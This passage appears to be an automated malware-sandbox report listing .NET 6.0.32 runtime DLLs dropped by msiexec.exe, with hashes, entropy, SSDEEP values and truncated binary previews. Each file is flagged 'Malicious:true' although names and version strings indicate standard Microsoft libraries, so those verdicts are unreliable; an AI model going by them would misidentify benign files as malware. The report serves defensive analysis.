                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....u............" ......|..........................................................a....`...@......@............... ..................................8...<...8R.......)...`..X_......T...........................................................8...H............text.....|.......|................. ..`.data...8"...0|..$....|.............@....reloc..X_...`...`...@..............@..B............................................0.......................(.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z..........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........@.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.DispatchProxy.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):66208
                                                                                                                                                                                                                                        Entropy (8bit):6.5748535239611074
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:zlGq66P0kymbnA0be+s8cu5BimUxbIuKmCinzk:zlx6URymbAiy8Bimx9mCIo
                                                                                                                                                                                                                                        MD5:9795FA4479E874973EBC95DB710F5AE7
                                                                                                                                                                                                                                        SHA1:710B8C7503ABC1DEEB1ABFEAD100043EA8E84CC1
                                                                                                                                                                                                                                        SHA-256:F20CADA99D1CCEE74B82670E3987372EADBC3DA3F87BA5AFD4203262E79463C9
                                                                                                                                                                                                                                        SHA-512:9D55902EB4E3C91BEC6264BA6B8BAECCF27D04136CFE6A2854A1AC9B4795F418D22FB8C2B120709AFE3610FF67C6328EEBE80A288F1CE127BDB8C840056575FD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....:-..........." ......................................................................`...@......@............... .......................................%...........(......0.......T...............................................................H............text............................... ..`.data...............................@....reloc..0...........................@..B............................................0...........................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...X. ...C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.e.f.l.e.c.t.i.o.n...D.i.s.p.a.t.c.h.P.r.o.x.y...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...h. ...F.i.l.e.D.e.s.c.r.i.p.t.i.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.ILGeneration.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.718453492542051
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:umLIkWVhUW3YA6VFHRN7TV/6fR9z+Arlutl+P:RL6JFCli9zhrlutlU
                                                                                                                                                                                                                                        MD5:33BB83C0329A3AA6508C3107B69BCB3F
                                                                                                                                                                                                                                        SHA1:CCF12D70AD543047A3B1B5C4AD6B9E9D146E3E93
                                                                                                                                                                                                                                        SHA-256:946DC1A1F9C330FC997ACD483DBAE7526850E36DBDB7BDCEC9AB641EC88F6177
                                                                                                                                                                                                                                        SHA-512:9ACCEBFB3E264AF66739D80966C49283DB1312ABA6E322C928F34FD946A304E18BEEDC94BD1D1222DAED8E82643C7E253CDF495FC5F835D1D5AAE8D78B6A0F0C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L............"!..0.............n*... ........@.. ....................................`..................................*..S....@...................(...`......P)..8............................................ ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P*......H........ ......................P ......................................{B.+k.Z.....6A+7{&....[.u.o^c....@.`.2..Z.....-u.Y....^?..I...e}..[J..........{.TQ.m.......`.N1.x.4..PI\..Y2\G.S......H.jBSJB............v4.0.30319......`.......#~..t...D...#Strings............#GUID...........#Blob......................3................................................"...........;...........f.......7.................b...!.b.....b...[.b.....b.....b.....b...B.b...O.b...v.............

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.Lightweight.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16152
                                                                                                                                                                                                                                        Entropy (8bit):6.716289561025598
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:pBAHj3OWxuVJWcX6HRN7L8h9R9zmwjSiD:+UZW4J9zLjSiD
                                                                                                                                                                                                                                        MD5:3BD0D0B84763138671CFDAAF0E86F9AF
                                                                                                                                                                                                                                        SHA1:40464810F0AA8A41FC29726B67D10C5A88566449
                                                                                                                                                                                                                                        SHA-256:287456D6B98567E5B329B69E533EC9B1D41AD9B5572913261A20004CECD8C594
                                                                                                                                                                                                                                        SHA-512:B7D55DCF369A632670023D92B4E07A931B1B0D5F341D7DD4300D8C3791C994ECE146B64DB442B4C72E1E418D281B92315BB386AF9C23CF145B653189E35C55B0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."!..0..............)... ........@.. ..............................6.....`..................................)..K....@...................)...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P .......................................Q..._R...6%......l.f......l.......=..E...v.x."...HtD..@t.l%....$&.R......K.U+...sK>.0....qI.....>.y...p..woxT.m...."B..BSJB............v4.0.30319......`.......#~..H.......#Strings....P.......#GUID...`.......#Blob......................3................................................2...........K.m.........v.......@.................G...1.G.....G...k.G.....G.....G.....G...R.G..._.G.................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.7217086921406155
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:dlxqu8LLLW6MCRW/3YA6VFHRN7Sq//Bmo8R9zMLgod:Mua2FClVRmoQ9zU
                                                                                                                                                                                                                                        MD5:E148929B3AB3CA72254029548EABF64E
                                                                                                                                                                                                                                        SHA1:F26F7E2EAB2DC37DD5E3E264281A3F2E473C8B87
                                                                                                                                                                                                                                        SHA-256:5BC03566BE47D7C6EF6FC512B1A1665567E3F73A1BAB828263230E932EA4B596
                                                                                                                                                                                                                                        SHA-512:74E5645CA885543CDF7FB589647F2C75FC58C6325D613C8DBFBAA2A145E96B64353358D3691DAE454FBDCD43E4ED42DD187791227EF81A736BD0FF940E441A7D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."!..0..............*... ........@.. ...............................p....`.................................d*..W....@...................(...`.......)..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H........ ......................P ......................................E...B.....P...oM.rXh.0C.....pX>.-..2........t..C+T^..j..iu..I-.W...{>....~H;...Y.......|...:S....w8..D../.WK?..NUdC.9$BSJB............v4.0.30319......`...X...#~......p...#Strings....(.......#GUID...8.......#Blob......................3................................................"...........;.....2.....f.......$.................+...!.+.....+...[.+.....+.....+.....+...B.+...O.+...v.............

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Extensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15648
                                                                                                                                                                                                                                        Entropy (8bit):6.802306968215209
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:mIBjrxJ+WKbWWvwWxNzx95jmHnhWgN7agWarn8RwX01k9z3A1Zx+XL7Dm4:mgRJ+WKbWWvvX6HRN7zrn9R9zmwjm4
                                                                                                                                                                                                                                        MD5:B8B928549CF3DDC413906F366B00A626
                                                                                                                                                                                                                                        SHA1:416B4D51DBA2452EE7160045FC0E666F52A1D15E
                                                                                                                                                                                                                                        SHA-256:7091A88BC875AE71C24CA697176F0FDB7B80BBA874E3AEDF485EE5C5A99EED8D
                                                                                                                                                                                                                                        SHA-512:3042A1A2F456302877017476E73B8095F1FE4F2B36569140C61A1D6B30597FE42CADCE6147551CA099E0A751BEBE0B2A530381D1EA3CC6A01AF49ADFD5756639
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....M..........."!..0.............n)... ........@.. ..............................i.....`..................................)..O....@.................. )...`......`(..8............................................ ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........ ......................P ......................................,...,..rh.u.b...A..KO(.6..3.<....*...t#.bf.:`......s....G...V:*....\u.O!2...u...C(.4.d.9G?....OY..[o./.u6.+:..H$:..7..BSJB............v4.0.30319......`.......#~..0.......#Strings............#GUID...........#Blob......................3..................................................,.....,...3.....L.....^.....a.................w.................w.................G.....I.,.......................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Metadata.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1130768
                                                                                                                                                                                                                                        Entropy (8bit):6.716178697279381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:Ac22hrYDBSZlNmj4C3MgRjfyTMCSTWeW8kJjaJlB9vN10wyQXoVODzty2el+jmZC:AQto0ClR2TMYpO/owh3Dzw2el+jgC
                                                                                                                                                                                                                                        MD5:0AE39983665F6795ECD075CD8E94B776
                                                                                                                                                                                                                                        SHA1:8059256845DB65BBE27EE549FEF7AAC5D984531E
                                                                                                                                                                                                                                        SHA-256:3680BEAEB634F53EB2FADCEDD43FDBE0763F6BD318FB01088DECB4D0441C27DB
                                                                                                                                                                                                                                        SHA-512:62C724C83658EA11321DCBE49F9764E0D5EEBCBD7FC1FAD81B707D8CADFAA6D7BD0B64221532C6681C4A421CF4D89963846F4241A3702826A8233013A05FA838
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................" .....4...................................................@......8B....`...@......@............... ..................................h...............)... ..h...xW..T...........................................................h...H............text...>2.......4.................. ..`.data........P.......6..............@....reloc..h.... ......................@..B............................................0.......................X.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........p.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...L.....0.0.0.0.0.4.b.0.........C.o.m.m.e.n.t.s...T.h.i.s. .p.a.c.k.a.g.e.s. .p.r.o.v.i.d.e.s. .a. .l.o.w.-.l.e.v.e.l. ...N.E.T. .(.E.C.M.A.-.3.3.5.). .m.e.t.a.d.a.t.a. .r.e.a.d.e.r. .a.n.d. .w.r.i.t.e.r... .I.t.'.s. .g.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.753447262554626
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:qrP0CPxxkYWSD+WrpWjA6Kr4PFHnhWgN7a8WgHH6J2OCjVi6KrIX01k9z3ALxQLS:M0+WYWSD+WrYA6VFHRN7L6x49R9zaxQu
                                                                                                                                                                                                                                        MD5:ED46EDD045A16E38ADD5814DCA362B0C
                                                                                                                                                                                                                                        SHA1:8E9CEF564A13E2800FCE2D7B447008AB28C5BA64
                                                                                                                                                                                                                                        SHA-256:A0EF5D467731B176A48C3D6B349EFB0E120365CD6CE700E02B8F02BD0D9FF5B6
                                                                                                                                                                                                                                        SHA-512:930E14F58DF97E446A1C2CD68DB2892FF1BFEBA972A7F6C6F548202269387F18D6E26C08CBF9124E9042C81ACC073A60EFFA2427D34135523ED8643D38C26C8D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....v{..........."!..0.............^+... ........@.. ...............................H....`..................................+..K....@...................(...`......T*..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@+......H........ ......................P ......................................+.U.........$V.....h..../...9.|R.7)..^ck?Si.'......TY..."...2!.I^#.._h...6.W'..c$..g.1'/L.~.........r....Cd..o...q...BSJB............v4.0.30319......`.......#~..........#Strings............#GUID...........#Blob......................3......................................3.........@...........Y...................`.................g...?.g.....g...y.g.....g.....g.....g...`.g...m.g.................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.TypeExtensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):33440
                                                                                                                                                                                                                                        Entropy (8bit):6.476067104710918
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:kmSlEcREAwcc1+Wc+bgvPLfmFClits89zSo:RSlEcocc1+Wc+bgvjfyi6zSo
                                                                                                                                                                                                                                        MD5:6EB4649F4FDF0E31924DB943C0F4DE49
                                                                                                                                                                                                                                        SHA1:413C6B6D0531BDBAB8E939D8D6673C30D25AB8BF
                                                                                                                                                                                                                                        SHA-256:D700C814151CE8AFB89419FA0DA373444999993EB99BBEE129C7529C83595BEF
                                                                                                                                                                                                                                        SHA-512:5639B5E9220623D50A40A1D07FBDA9B63B718EBF7AC00B1B1C6807E4FD6464A7B61F0FEDAABC8840D6B0CF09079C6523A571D3C2F2D41FDF204559E526460110
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....#..........." .....P................................................................`...@......@............... ......................................D........Z...(...p..........T...............................................................H............text....N.......P.................. ..`.data........`.......R..............@....reloc.......p.......X..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...Z.!...C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.e.f.l.e.c.t.i.o.n...T.y.p.e.E.x.t.e.n.s.i.o.n.s.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...j.!...F.i.l.e.D.e.s.c.r.i.p.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16664
                                                                                                                                                                                                                                        Entropy (8bit):6.7304228518382665
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:xe1MZK+hTxxYVk+jWhHCWWWhWxNzx95jmHnhWgN7acWafnjyttuX01k9z3A1iaMb:4EpiZjWhHCWLKX6HRN7SSR9zWia87T
                                                                                                                                                                                                                                        MD5:9E6DFCB7B11307322D29628962C8DA01
                                                                                                                                                                                                                                        SHA1:C92E0A8B9C638485F1FBB8E8FF5AD0C7E79B3142
                                                                                                                                                                                                                                        SHA-256:03B4718EC3BEB7F6F5C982C41117CFF12475C0656E3F6741106C9BCA2F582714
                                                                                                                                                                                                                                        SHA-512:4D9C2C0B293C2994BABD297167584BE76438B77595B8936ADC467A54960AA06A3DD6214EA569FA74A16B8B385DA3A068C783851566248A677D73C8AFD61813E2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(q............"!..0..............-... ........@.. ...................................`.................................8-..S....@..h................)...`.......,..8............................................ ............... ..H............text........ ...................... ..`.rsrc...h....@......................@..@.reloc.......`......................@..B................p-......H........ ......................P ......................................VJ#...;l.?.D..Y..<......=........0.,I.e..A.x....y.."*..t.@.}#...A.G.........j.|..q0....d%&Z.....$.q+<.x.....O..=R.A.BSJB............v4.0.30319......`.......#~..........#Strings............#GUID... .......#Blob......................3................................#.....a.........z.<.....<.........\.......3.....w...U.....M.....7.....y.................................................<...........

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.Reader.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15624
                                                                                                                                                                                                                                        Entropy (8bit):6.785037363575662
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:SFP0axKOW4A3WIEppWjA6Kr4PFHnhWgN7acW7m/yttuX01k9z3A1ir:4PZKOW4A3WIEpYA6VFHRN7GvSR9zWir
                                                                                                                                                                                                                                        MD5:32B77094CD111197938D57101F437A87
                                                                                                                                                                                                                                        SHA1:0D19DE916A18106E63F25E9E0DA4E13519FD0847
                                                                                                                                                                                                                                        SHA-256:27125239D58403F260966DB56F490B94A6992BFC8BB7391E255134BC24B956D3
                                                                                                                                                                                                                                        SHA-512:9BCC1B8A2D17EDA2C97B2F30AFE73C73F747C2318824D93231F6E5C5E274FD724AFE0987D1C77F4F07DF4EB1165BE77C943D439D3370F62B9D932D5744E78CB6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8............."!..0..............)... ........@.. ...............................j....`..................................(..K....@...................)...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H........ ..@...................P ........................................i.@~N..D.D..2......B......."..\.zE'\...R.._6..v].6...._`..rS..s..fyAg.7..N..#t..oi.1......[..(...b./.H..j.;..<O.%!K.,.[BSJB............v4.0.30319......`.......#~..........#Strings............#GUID...........#Blob......................3..................................................=.....=...3.*...n.....^.....a.................w.................w.................G.....I.=.................$.....

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.ResourceManager.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.76516043840326
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:n/msL3vWVszWSYA6VFHRN72JBmo8R9zMLArCYXo:uszVdFCl2TmoQ9zhj4
                                                                                                                                                                                                                                        MD5:D9DD864AC4B90BA4E63AF795256B701F
                                                                                                                                                                                                                                        SHA1:4DBF63E5D8089DFA2792A9A54AA91D6CC2682173
                                                                                                                                                                                                                                        SHA-256:0DA11F94B9CF32240B99497802076E9C4A37CF0F4E46AD83D63FEE3AE7B5CA9A
                                                                                                                                                                                                                                        SHA-512:8758B926D8AAB3D09BEE8AD989EAC867EB989D31D625DF6C6CA9873DBD66B0917657A358CCABDFA4A816DFB7BE877F96A36A0370A9FD58824DBC2159B04A2B82
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....r............"!..0.............^+... ........@.. ...............................Z....`..................................+..O....@...................(...`......H*..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@+......H........ ..x...................P ......................................K..............h?.:..P.=,.?.......\W..`..[7.....P..L..........'.|....IK.....!.l.......=H...8b5..t.3{.qu.....D..Y...F.z....BSJB............v4.0.30319......`...h...#~..........#Strings............#GUID...........#Blob......................3......................................M.........f...........].l.................r...A.....9.....#.....!.........................................q...................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.Writer.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):45344
                                                                                                                                                                                                                                        Entropy (8bit):6.554040619235554
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:bp7oRtyqsSfySDzEjIPvG8lZ6r+WJR9zLjk:bS/Hjnz+0vGU3WJDz
                                                                                                                                                                                                                                        MD5:3B10AEE75EFECF3842D35624FADD1592
                                                                                                                                                                                                                                        SHA1:859B1BC05DB81D2C9E1D4BBB78497201DF4E5F10
                                                                                                                                                                                                                                        SHA-256:F6E56F2540DD97088089B7BCCDF9C8DE63B9EFDCBA8F413C4D691D0D9650B059
                                                                                                                                                                                                                                        SHA-512:EA64E351A623C949EF1E0D0780B5BC2921AAC34698FD106194E87021D2A92200BE2937F2DCBA7651386E4EA6554AE52646174477E4C3D8EC923B4222A6289FB0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....f..........." .....v................................................................`...@......@............... ..........................................@....... )..............T...............................................................H............text....u.......v.................. ..`.data................x..............@....reloc..............................@..B............................................0...........................<.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...x.....0.0.0.0.0.4.b.0...H.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.e.s.o.u.r.c.e.s...W.r.i.t.e.r...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...X.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22816
                                                                                                                                                                                                                                        Entropy (8bit):6.422373350096493
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:1Wgb2WYaXPPGmNOWWWfmXonPQ6X6HRN7wdkyEpcR9zt5dod:F5HGmNG0LWuEpw9zTe
                                                                                                                                                                                                                                        MD5:0CD66CD03167DE27EBA44176A20B1DE6
                                                                                                                                                                                                                                        SHA1:79F3403535AC862911ECC216499325CD0349AE22
                                                                                                                                                                                                                                        SHA-256:6C14B33F85E1F559D4FEC82C188D7377B9AF11D24F17DA66BC6F30FA72ED59AE
                                                                                                                                                                                                                                        SHA-512:4027EB337FCC5271DE79FD72845EDFE65BD1D27B3D2C027E4B789D58A511A9584D0893A6D17C04C3C4209A7720B661A4916EDC62B39F700EC1AC334AC1ABC336
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....lf.........." .....*...................................................`............`...@......@............... ......................................$........0.. )...P..........8...............................................................H............text...o).......*.................. ..`.data...=....@.......,..............@....reloc.......P......................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...f.'...C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.u.n.t.i.m.e...C.o.m.p.i.l.e.r.S.e.r.v.i.c.e.s...U.n.s.a.f.e.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...v.'...F.i.l.e.D.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.CompilerServices.VisualC.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20128
                                                                                                                                                                                                                                        Entropy (8bit):6.579414670424758
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:CWsELWh2IrR/Tvna4EcWQOYA6VFHRN7JBR9zpO1:LS2q/Tvna49OFClJr9zw1
                                                                                                                                                                                                                                        MD5:9797EE9E57A027A698160566E9D90B25
                                                                                                                                                                                                                                        SHA1:466BF47F20DDEE5EBDB17882B6516CB0D3674B82
                                                                                                                                                                                                                                        SHA-256:F04A92B890D871BAA63CED5AAE3A993157B2EDD8AA5996607A046CFE9A4D63F8
                                                                                                                                                                                                                                        SHA-512:0FBDBF279B2E04631FA19E948D2F03499D1B7F1ACC9512B402DBBE2DA7CE12F6090D9393415E94F77D6DE380671506BF4F4BC851F88C103E344371D081CAA66A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
